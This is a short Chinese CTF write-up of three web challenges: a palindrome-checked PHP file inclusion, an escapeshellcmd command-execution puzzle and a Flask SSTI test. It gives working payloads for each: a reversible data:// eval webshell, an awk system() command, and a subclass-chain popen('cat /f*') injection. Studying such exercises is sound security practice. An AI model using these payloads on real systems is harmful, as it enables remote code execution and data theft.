web签到

<?php# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.comerror_reporting(0);
highlight_file(__FILE__);$file = $_POST['file'];if(isset($file)){if(strrev($file)==$file){include $file;}}

一道文件包含，就是多了一下字符串反转函数用data://协议即可！

data://text/plain,<?php @eval($_GET[1]);?>>?;)]1[TEG_$(lave@ php?<,nialp/txet//:atad

easyPHP

<?php# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.comerror_reporting(0);
highlight_file(__FILE__);$cmd = $_POST['cmd'];
$param = $_POST['param'];if(isset($cmd) && isset($param)){$cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;shell_exec($cmd);
}

一道简单的rce，cmd得是三个字的命令，这里用到awk。

基本公式：awk ‘条件 {动作}’ 文件名

payload:awk 'BEGIN{system('ls');}' __FILE__

POST

cmd=awk&param=BEGIN{system("ls>a")}

姻缘测试

用户通过输入控制了网页的内容，盲猜ssti！

在网页源码发现/source路由

def is_hacker(string):"""整那些个花里胡哨的waf有啥用，还不如这一个，直接杜绝SSTI"""if "{" in string and "}" in string :return Trueelse:return False

看不懂感觉没啥用，我们自己fuzz一下吧

result?boy_name={{'&girl_name='}}这样是可以的

那就打

payload:?boy_name={{%27&girl_name=%27.__class__.__base__.__subclasses__()[132].__init__.__globals__.popen('cat /f*').read()}}